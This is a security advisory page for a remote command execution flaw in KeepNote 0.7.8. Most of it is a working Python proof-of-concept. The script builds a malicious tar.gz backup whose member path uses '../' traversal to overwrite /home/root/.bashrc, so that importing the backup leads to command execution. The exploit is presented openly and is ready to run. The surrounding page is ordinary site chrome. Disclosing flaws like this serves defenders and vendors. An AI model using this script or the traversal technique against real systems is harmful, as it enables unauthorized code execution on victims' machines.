KeepNote 0.7.8 Remote Command Execution

2016.09.30
Credit: R-73eN
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title : KeepNote 0.7.8 Remote Command Execution # Date : 29/09/2016 # Author : R-73eN # Twitter : https://twitter.com/r_73en # Tested on : KeepNote 0.7.8 (Kali Linux , and Windows 7) # Software : http://keepnote.org/index.shtml#download # Vendor : ~ # # DESCRIPTION: # # When the KeepNote imports a backup which is actuallt a tar.gz file doesn't checks for " ../ " characters # which makes it possible to do a path traversal and write anywhere in the system(where the user has writing permissions). # This simple POC will write to the /home/root/.bashrc the file test.txt to get command execution when the bash is run. # There are a lot of ways but i choose this just for demostration purposes and its supposed we run the keepnote application # as root (default in kali linux which this bug is tested). # # banner = "" banner +=" ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / | | \n" banner +=" | || '_ | |_ / _ | | _ / _ '_ / _ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ | |___ \n" banner +=" |___|_| |_|_| ___/ ____|___|_| |_| /_/ ______|\n\n" print banner import tarfile, sys if(len(sys.argv) != 2): print "[+] Usage : python exploit.py file_to_do_the_traversal [+]" print "[+] Example: python exploit.py test.txt" exit(0) print "[+] Creating Exploit File [+]" filename = "KeepNoteBackup.tar.gz" path = "../../../../../../../home/root/.bashrc" tf = tarfile.open(filename,"w:gz") tf.add(sys.argv[1], path) tf.close() print "[+] Created KeepNoteBackup.tar.gz successfully [+]"


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top